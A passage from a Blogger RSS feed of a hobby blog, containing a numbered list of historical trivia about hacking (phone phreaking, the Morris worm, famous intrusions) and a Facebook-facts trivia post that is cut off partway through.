&lt;span style="background-color: white; color: #333333; font-family: &amp;quot;kite one&amp;quot; , sans-serif; line-height: 22.390625px;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;The Codes used in this widget are provided by&amp;nbsp;&lt;a href="http://www.southernspeakers.net/" style="color: #289728; outline: none; text-decoration: none;"&gt;http://www.southernspeakers.net/&lt;/a&gt;. If you wish to share this tutorial on your blog please give a link back to this tutorial.&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white; color: #333333; font-family: &amp;quot;kite one&amp;quot; , sans-serif; line-height: 22.390625px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white; color: #333333; font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; line-height: 22.390625px;"&gt;&lt;/span&gt;&lt;span style="background-color: white; color: #333333; font-family: &amp;quot;kite one&amp;quot; , sans-serif; line-height: 22.390625px;"&gt;&lt;/span&gt;&lt;br style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;" /&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;b&gt;Help:&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;If You Face Any Difficulty Feel Free To Ask me.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #666666; font-size: x-large;"&gt;____----Our hack is yours----____&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #666666; font-size: x-large;"&gt;Your blogger&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.mylivesignature.com/" style="margin-left: 1em; margin-right: 1em; text-align: center;" target="_blank"&gt;&lt;img src="https://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" style="background: transparent; border: 0 !important;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRacUxVqZGLg8-SGX2b4jp_7j4TuuMkYu_23fsIuEde4MZ5t9zaXtBkWqtLTFELQLb_KRWKSdRkp1NNxX7qQ31BK8rnI64g1VDXSCD87RuR1KAc4ajlz0FfXx-Zf-L0C1enWrSaE-UKb4/s72-c/0.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Facts about hacking</title><link>https://snacksofhacks.blogspot.com/2013/02/facts-about-hacking.html</link><category>FaCts</category><category>HaCkinG</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Fri, 22 Feb 2013 23:34:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-9146958090704024140</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;b&gt;Amazing facts about hacking you ever know/..&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;a href="http://cdn.media.discovermagazine.com/~/media/import/images/1/3/2/computer.jpg?mw=300" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img alt="computer" border="0" src="http://cdn.media.discovermagazine.com/~/media/import/images/1/3/2/computer.jpg?mw=300" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;1&lt;/strong&gt;&amp;nbsp;&amp;nbsp;&lt;em&gt;Hacker&amp;nbsp;&lt;/em&gt;originally meant “one who makes furniture with an ax.” Perhaps because of the blunt nature of that approach, the word came to mean someone who takes pleasure in an unconventional solution to a technical obstacle.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;2&lt;/strong&gt;&amp;nbsp;&amp;nbsp;Computer hacking was born in the late 1950s, when members of&amp;nbsp;&lt;a class="external-link" href="http://tmrc.mit.edu/" style="color: red; outline: none;"&gt;MIT’s Tech Model Railroad Club&lt;/a&gt;, obsessed with electric switching, began preparing punch cards to control an&amp;nbsp;&lt;a class="external-link" href="http://www-03.ibm.com/ibm/history/exhibits/mainframe/mainframe_PP704.html" style="color: red; outline: none;"&gt;IBM 704 mainframe&lt;/a&gt;.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;3&lt;/strong&gt;&amp;nbsp;&amp;nbsp;One of the club’s early programs: code that illuminated lights on the mainframe’s console, making it look like a ball was zipping from left to right, then right to left with the flip of a switch. Voilà: computer Ping-Pong!&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;4&lt;/strong&gt;&amp;nbsp;&amp;nbsp;By the early 1970s, hacker&amp;nbsp;&lt;a class="external-link" href="http://www.webcrunchers.com/crunch/" style="color: red; outline: none;"&gt;“Cap’n Crunch”&lt;/a&gt;&amp;nbsp;(a.k.a. John Draper) had used a toy whistle to match the 2,600-hertz tone used by AT&amp;amp;T’s long-distance switching system. This gave him access to call routing (and brief access to jail).&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;5&lt;/strong&gt;&amp;nbsp;&amp;nbsp;Before they struck it rich, Apple founders&amp;nbsp;&lt;a class="external-link" href="http://www.iwoz.org/" style="color: red; outline: none;"&gt;Steve Wozniak&lt;/a&gt;&amp;nbsp;and&amp;nbsp;&lt;a class="external-link" href="http://www.apple.com/pr/bios/jobs.html" style="color: red; outline: none;"&gt;Steve Jobs&lt;/a&gt;&amp;nbsp;made and sold “blue boxes,” electronic versions of Draper’s whistle.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;6&lt;/strong&gt;&amp;nbsp;&amp;nbsp;Using a blue box, Wozniak crank-called the Pope’s residence in Vatican City and pretended to be Henry Kissinger.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;7&lt;/strong&gt;&amp;nbsp;&amp;nbsp;Hacking went Hollywood in the 1983 movie&amp;nbsp;&lt;a class="external-link" href="http://www.imdb.com/title/tt0086567/" style="color: red; outline: none;"&gt;&lt;em&gt;WarGames&lt;/em&gt;&lt;/a&gt;, about a whiz kid who breaks into a Defense Department computer and, at one point, hi­jacks a pay phone by hot-wiring it with a soda can pull-ring.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;8&lt;/strong&gt;&amp;nbsp;&amp;nbsp;That same year, six Milwaukee teens hacked into&amp;nbsp;&lt;a class="external-link" href="http://www.lanl.gov/" style="color: red; outline: none;"&gt;Los Alamos National Lab&lt;/a&gt;, which develops nuclear weapons.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;9&lt;/strong&gt;&amp;nbsp;&amp;nbsp;In 1988&amp;nbsp;&lt;a class="external-link" href="http://ethics.csc.ncsu.edu/abuse/wvt/worm/" style="color: red; outline: none;"&gt;Robert T. Morris&lt;/a&gt;&amp;nbsp;created a worm, or self-replicating program, purportedly to evaluate Internet security.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;10&lt;/strong&gt;&amp;nbsp;&amp;nbsp;The worm reproduced too well, however. The multi­million-dollar havoc that ensued led to Morris’s felony conviction, one of the first under the Computer Fraud and Abuse Act (&lt;a class="external-link" href="http://www.justice.gov/criminal/cybercrime/ccmanual/01ccma.pdf" style="color: red; outline: none;"&gt;PDF&lt;/a&gt;).&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;11&lt;/strong&gt;&amp;nbsp;&amp;nbsp;They all come home eventually. Morris&amp;nbsp;&lt;a class="external-link" href="http://pdos.csail.mit.edu/~rtm/" style="color: red; outline: none;"&gt;now researches computer science&lt;/a&gt;at...MIT.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;12&lt;/strong&gt;&amp;nbsp;&amp;nbsp;British hacker&amp;nbsp;&lt;a class="external-link" href="http://news.bbc.co.uk/2/hi/technology/4715612.stm" style="color: red; outline: none;"&gt;Gary McKinnon&lt;/a&gt;&amp;nbsp;broke into 97 U.S. Navy, Army, Pentagon, and NASA computers in 2001 and 2002.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;13&lt;/strong&gt;&amp;nbsp;&amp;nbsp;McKinnon’s defense: He wasn’t hunting military secrets; he was only seeking suppressed government files about space aliens.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;14&lt;/strong&gt;&amp;nbsp;&amp;nbsp;According to rumor, agents of China’s People’s Liberation Army attempted to hack the U.S. power grid, triggering the great North American blackout of 2003.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;15&lt;/strong&gt;&amp;nbsp;&amp;nbsp;It took IBM researcher Scott Lunsford just&amp;nbsp;&lt;a class="external-link" href="http://www.forbes.com/2007/08/22/scada-hackers-infrastructure-tech-security-cx_ag_0822hack.html" style="color: red; outline: none;"&gt;one day to penetrate the network of a nuclear power station&lt;/a&gt;: “I thought, ‘Gosh, this is a big problem.’”&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;16 &amp;nbsp;&lt;/strong&gt;Unclear on the concept: When West Point holds its annual&amp;nbsp;&lt;a class="external-link" href="http://www.nytimes.com/2009/05/11/technology/11cybergames.html" style="color: red; outline: none;"&gt;cyberwar games&lt;/a&gt;, the troops wear full fatigues while fighting an enemy online.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;17&lt;/strong&gt;&amp;nbsp;&amp;nbsp;Think your Mac is hackproof? At this year’s&amp;nbsp;&lt;a class="external-link" href="http://www.cansecwest.com/" style="color: red; outline: none;"&gt;CanSecWest conference&lt;/a&gt;, security researcher Charlie Miller used a flaw in Safari to break into a MacBook in under 10 seconds.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;18&lt;/strong&gt;&amp;nbsp;&amp;nbsp;Cyborgs beware:&amp;nbsp;&lt;a class="external-link" href="http://www.cs.washington.edu/homes/yoshi/" style="color: red; outline: none;"&gt;Tadayoshi Kohno&lt;/a&gt;&amp;nbsp;at the University of Washington recently hacked into a wireless defibrillator, causing it to deliver fatal-strength jolts of electricity.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;19&lt;/strong&gt;&amp;nbsp;&amp;nbsp;This does not bode well for patients receiving wireless deep-brain stimulators.&lt;/div&gt;
&lt;div style="font-family: Georgia, 'Times New Roman', serif; font-size: 15px; line-height: 21px; margin-bottom: 25px; margin-top: 1em; padding: 0px;"&gt;
&lt;strong&gt;20&lt;/strong&gt;&amp;nbsp;&amp;nbsp;The greatest kludge of all?&amp;nbsp;&lt;a class="external-link" href="http://www.optics.arizona.edu/Faculty/Resumes/Angel.htm" style="color: red; outline: none;"&gt;Roger Angel&lt;/a&gt;&amp;nbsp;of the University of Arizona has proposed building a giant sunscreen in space to hack the planet’s climate.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;Thanks for your support friends please like,comment and share;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #444444; font-size: x-large;"&gt;____----Our hack is yours----____&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Your blogger&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;a href="http://www.mylivesignature.com/" target="_blank"&gt;&lt;img src="http://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" style="background: transparent; border: 0 !important;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>10 facebook facts</title><link>https://snacksofhacks.blogspot.com/2013/02/10-facebook-facts.html</link><category>FaCts</category><category>MuSt C</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Fri, 22 Feb 2013 23:29:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-2015702312280934058</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 class="subtit" style="font-size: 16px;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY_L4aV1mXGZme0hnIct35cFc1sTRJEhPNmehtCC4M3bBSyG_tfRz4UjJVao-TeusT_TaOoirWuVwgLjWCnronI8rA32rd-pjyz183WXqfSaSw1nxWGgosb19_wzk8CPwzvykiyUboj_s/s1600/AAEAAQAAAAAAAAr6AAAAJDg2YmZlNzcwLTZiNWItNDNlMS1hMGUzLWY5NTNhYWYyMmQ2Yg.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="450" data-original-width="800" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY_L4aV1mXGZme0hnIct35cFc1sTRJEhPNmehtCC4M3bBSyG_tfRz4UjJVao-TeusT_TaOoirWuVwgLjWCnronI8rA32rd-pjyz183WXqfSaSw1nxWGgosb19_wzk8CPwzvykiyUboj_s/s640/AAEAAQAAAAAAAAr6AAAAJDg2YmZlNzcwLTZiNWItNDNlMS1hMGUzLWY5NTNhYWYyMmQ2Yg.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/h2&gt;
&lt;center style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;
&lt;/center&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;h2 class="subtit" style="font-size: 16px;"&gt;
&amp;nbsp;The average user has 130 friends&lt;/h2&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;Are you worried about your popularity? The average number of friends on Facebook is 130, and women tend to have somewhat more than men. Yet despite having hundreds of friends, most people only interact regularly with 4 to 7 people.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;So, what's YOUR number?&amp;nbsp;&lt;/span&gt;&lt;nobr style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;&lt;small&gt;(&lt;a href="http://www.economist.com/node/13176775" rel="nofollow" style="color: #703a00;" target="_blank"&gt;Link&lt;/a&gt;)&lt;/small&gt;&lt;/nobr&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h2 class="subtit" style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 16px; line-height: 20px;"&gt;
&amp;nbsp;Over 25% of users have already been dumped via Facebook&lt;/h2&gt;
&lt;center style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;
&lt;img alt="Over 25% of users have already been dumped via Facebook" border="0" class="imgl" src="https://www.oddee.com/_media/imgs/articles2/a97980_fb-fact_2-dumped.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 20px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 1px solid rgb(204, 204, 204); margin-bottom: 10px; padding: 8px;"&gt;&lt;/center&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;A June 2010 survey of 1,000 Facebook users -- 70% of whom were male -- found that 25% had been "dumped" via Facebook (via their significant other updating his or her relationship status).&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;Twenty-one percent of those surveyed said they would end a relationship by changing their Facebook relationship statuses to "single." While worrisome, the survey does show the majority of people do not split up via Facebook.&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;PD: This photo is from a genuine FB status.&amp;nbsp;&lt;/span&gt;&lt;nobr style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;&lt;small&gt;(&lt;a href="http://articles.cnn.com/2011-05-26/tech/facebook.facts.cashmore_1_facebook-users-facebook-friends-facebook-updates/2?_s=PM:TECH" rel="nofollow" style="color: #703a00;" target="_blank"&gt;Link&lt;/a&gt;)&lt;/small&gt;&lt;/nobr&gt;&lt;br /&gt;
&lt;nobr style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;&lt;small&gt;&lt;br /&gt;&lt;/small&gt;&lt;/nobr&gt;
&lt;h2 class="subtit" style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 16px; line-height: 20px;"&gt;
&amp;nbsp;Facebook doesn't allow breastfeeding photos&lt;/h2&gt;
&lt;center style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;
&lt;img alt="Facebook doesn&amp;#39;t allow breastfeeding photos" border="0" class="imgl" src="https://www.oddee.com/_media/imgs/articles2/a97980_fb-fact_6-breastfeeding.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 20px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 1px solid rgb(204, 204, 204); margin-bottom: 10px; padding: 8px;"&gt;&lt;/center&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;Facebook, the popular social networking website, provoked a squall of maternal wrath when it yanked photos of breastfeeding babies that women had posted on their personal profiles because it deemed them a little too revealing. This, by the way, from a website that allows photos of women in thongs and bikinis and of couples making out; it has even accepted paid advertising for a dating website that featured a topless model. (The topless ad was taken down after angry women noted the hypocrisy.)&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;In response to the terse notices alerting mothers that they were violating Facebook's decency policy, "lactivists" responded with a virtual nurse-in; 11,000 women posted photos of themselves breastfeeding and/or updated their profiles to read: "Hey, Facebook. Breastfeeding Is Not Obscene!"&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;The pro-breastfeeding group has attracted over 250,000 members.&amp;nbsp;&lt;/span&gt;&lt;nobr style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;&lt;small&gt;(&lt;a href="https://www.facebook.com/group.php?gid=2517126532" rel="nofollow" style="color: #703a00;" target="_blank"&gt;Link 1&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://bits.blogs.nytimes.com/2009/01/02/breastfeeding-facebook-photos/" rel="nofollow" style="color: #703a00;" target="_blank"&gt;Link 2&lt;/a&gt;)&lt;/small&gt;&lt;/nobr&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;center style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;
&lt;/center&gt;
&lt;h2 class="subtit" style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 16px; line-height: 20px;"&gt;
&amp;nbsp;Facebook causes 1 in 5 Divorces&lt;/h2&gt;
&lt;center style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;
&lt;img alt="Facebook causes 1 in 5 Divorces" border="0" class="imgl" src="https://www.oddee.com/_media/imgs/articles2/a97980_fb-fact_4-divorce.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 20px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 1px solid rgb(204, 204, 204); margin-bottom: 10px; padding: 8px;"&gt;&lt;/center&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;It used to be the tell-tale lipstick on the collar. Then there were the give-away texts that spelled the death knell for many marriages. But now one in five divorces involve the social networking site Facebook, according to a new survey by the American Academy of Matrimonial Lawyers.&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;A staggering 80 per cent of divorce lawyers have also reported a spike in the number of cases that use social media for evidence of cheating.&amp;nbsp;&lt;/span&gt;&lt;nobr style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;&lt;small&gt;(&lt;a href="http://www.dailymail.co.uk/news/article-1334482/The-marriage-killer-One-American-divorces-involve-Facebook.html#ixzz1dJbNVIA2" rel="nofollow" style="color: #703a00;" target="_blank"&gt;Link&lt;/a&gt;)&lt;/small&gt;&lt;/nobr&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;h2 class="subtit" style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 16px; line-height: 20px;"&gt;
&amp;nbsp;Al Pacino was the first ‘face' on Facebook&lt;/h2&gt;
&lt;center style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;
&lt;img alt="Al Pacino was the first ‘face&amp;#39; on Facebook" border="0" class="imgl" src="https://www.oddee.com/_media/imgs/articles2/a97980_fb-fact_5-pacino.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 20px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 1px solid rgb(204, 204, 204); margin-bottom: 10px; padding: 8px;"&gt;&lt;/center&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;Remember that sad-looking blue guy on Facebook's homepage who used to stare you down every time you went to log in? They did away with him in 2007, so if you were late to the social networking party, then you probably have absolutely no idea what we're talking about. Anyway according to David Kirkpatrick's The Facebook Effect , it turns out that that guy in the logo, created by Zuckerberg's friend and classmate Andrew McCollum, was none other than a young Al Pacino “covered with a fog of ones and zeros — the elementary components of digital media.” Crazy, right?&amp;nbsp;&lt;/span&gt;&lt;nobr style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;&lt;small&gt;(&lt;a href="http://flavorwire.com/100802/weird-but-true-al-pacino-was-the-original-face-of-facebook" rel="nofollow" style="color: #703a00;" target="_blank"&gt;Link&lt;/a&gt;)&lt;/small&gt;&lt;/nobr&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
&lt;h2 class="subtit" style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 16px; line-height: 20px;"&gt;
&amp;nbsp;36% of users check Facebook, Twitter or texts after sex&lt;/h2&gt;
&lt;center style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;"&gt;
&lt;img alt="36% of users check Facebook, Twitter or texts after sex" border="0" class="imgl" src="https://www.oddee.com/_media/imgs/articles2/a97980_fb-fact_3-after-sex.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 20px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 1px solid rgb(204, 204, 204); margin-bottom: 10px; padding: 8px;"&gt;&lt;/center&gt;
&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;verdana&amp;quot;; font-size: 14px; line-height: 20px;"&gt;Lighting a cigarette after sex? That's soooo last season.&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; font-family: Georgia, Arial, Verdana; font-size: 14px; line-height: 20px;" /&gt;
